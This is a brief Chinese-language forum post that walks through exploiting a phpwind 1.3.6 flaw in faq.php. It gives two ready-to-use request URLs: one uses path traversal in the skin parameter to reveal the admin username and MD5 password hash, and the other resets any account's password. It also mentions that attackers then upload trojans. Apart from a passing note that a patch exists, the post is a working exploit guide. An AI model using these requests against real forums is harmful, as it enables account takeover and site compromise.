这几天黑多phpwind 1.3.6的论坛被黑了
都是不注意安全的问题,补丁虽然很早就发布了
可是大家没有注意
我就说说漏洞是如何利用的吧
咱不是专业人士,说的门外一点,大家都能看懂
faq.php?skin=../../admin/manager&tplpath=admin
利用这个,大家学过一点的都可以看明白
=../../admin/manager&tplpath= 是什么意思前面SKIN英语也很直接了
admin 这个就更不用说了,管理员
打开也面你能看到ADMIN的帐户名和MD5的密码
这样,未补丁的论坛利用faq.php达到了第一个目的
查看ADMIN的ID也就是用户名,呵呵,其实不用查,直接看看论坛也能知道
要是有人不嫌烦,估计会慢慢破你的MD5密码,有人会以此为乐趣的
because of
he wanna get your password
faq.php?skin=../../admin/manager&username=admin&password=pass&check_pwd=pass&action=go
能知道上面的,这个我想也知道了,就是改密码了
username=admin //admin就是管理员的帐户啦,你想改其他人的随你了,呵呵
password=pass //pass 当然是密码,毫无疑问
check_pwd=pass //这个说了就是废话了
action=go // go go go fire in the hole
这样我们的最终目的达到,修改密码成功了
居心叵测的人们会利用这个漏洞上传木马
具体怎么做就不多说了,说下去就是教坏小朋友了(其实主要是我不会)
呵呵,然后。。。
结果大家都知道了